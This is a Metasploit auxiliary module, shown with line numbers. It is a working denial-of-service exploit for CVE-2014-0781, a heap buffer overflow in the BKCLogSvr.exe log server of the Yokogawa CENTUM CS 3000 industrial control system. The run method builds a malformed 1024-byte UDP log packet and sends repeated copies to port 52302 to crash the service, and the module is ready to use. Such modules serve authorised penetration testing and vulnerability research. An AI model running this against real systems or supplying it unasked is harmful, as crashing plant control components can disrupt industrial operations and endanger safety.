Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow',
13
      'Description'    => %q{
14
        This module abuses a buffer overflow vulnerability to trigger a Denial of Service
15
        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability
16
        exists in the handling of malformed log packets, with an unexpected long level field.
17
        The root cause of the vulnerability is a combination of usage of uninitialized memory
18
        from the stack and a dangerous string copy. This module has been tested successfully
19
        on Yokogawa CENTUM CS 3000 R3.08.50.
20
      },
21
      'Author'         =>
22
        [
23
          'juan vazquez',
24
          'Redsadic <julian.vilas[at]gmail.com>'
25
        ],
26
      'References'     =>
27
        [
28
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
29
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],
30
          [ 'CVE', '2014-0781']
31
        ],
32
      'DisclosureDate' => '2014-03-10',
33
    ))
34

35
    register_options(
36
      [
37
        Opt::RPORT(52302),
38
        OptInt.new('RLIMIT', [true,  "Number of packets to send", 10])
39
      ])
40
  end
41

42
  def run
43
    if datastore['RLIMIT'] < 2
44
      print_error("Two consecutive packets are needed to trigger the DoS condition. Please increment RLIMIT.")
45
      return
46
    end
47

48
    # Crash due to read bad memory
49
    test = [1024].pack("V")             # packet length
50
    test << "AAAA"                      # Unknown
51
    test << "SOURCE\x00\x00"            # Source
52
    test << "\x00" * 8                  # Padding
53
    test << "B" * (1024 - test.length)  # Level & Message coalesced
54

55
    connect_udp
56

57
    # Sending two consecutives packages is enough to
58
    # trigger the overflow and cause the DoS. But if
59
    # legit packets are processed by the server, between
60
    # the two malformed packages, overflow won't happen.
61
    # Unfortunately because of the usage of UDP and the
62
    # absence of answer, there isn't a reliable way to
63
    # check if the DoS condition has been triggered.
64
    print_status("Sending #{datastore['RLIMIT']} packets...")
65
    (1..datastore['RLIMIT']).each do |i|
66
      vprint_status("Sending #{i}/#{datastore['RLIMIT']}...")
67
      udp_sock.put(test)
68
    end
69

70
    disconnect_udp
71
  end
72
end
73

74